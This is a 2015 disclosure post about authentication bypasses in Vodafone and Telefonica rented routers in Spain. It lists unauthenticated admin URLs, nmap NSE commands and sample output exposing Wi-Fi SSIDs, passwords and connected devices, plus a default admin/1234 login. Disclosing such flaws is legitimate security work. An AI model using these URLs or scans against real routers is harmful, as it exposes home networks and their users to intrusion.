Huawei HG253s V2 Information Disclosure
Posted on 25 November 2015
Huawei HG253s v2 Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @VicenDominguez Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IPhtml_253s/api/ntwk/WlanBasic http://IP/html_253s/api/system/diagnose_internet http://IP/html_253s/api/system/hostinfo?type=ethhost http://IP/html_253s/api/system/hostinfo?type=guesthost http://IP/html_253s/api/system/hostinfo?type=homehost http://IP/html_253s/api/system/hostinfo?type=wifihost http://IP/html_253s/api/system/wizardcfg Usage nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-vodafone-hua253s: | SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456 | Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX Comtrend VG 8050 Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Usage nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-comtrend-vg-8050: | SSID: MOVISTAR_XXX | Cipher Algorithm: WPA | Password WEP: | Password WPA: gTU3NkXE44RYjuM2RrxM | Password WPA2: | Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X ADB P.DGA4001N (HomeStation) Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Add the credentials by default are admin / 1234 Usage nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-homestation: | SSID: WLAN_HOME | Cipher Algorithm: WEP | Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X Here the scripts https://github.com/DaniLabs/scripts-nse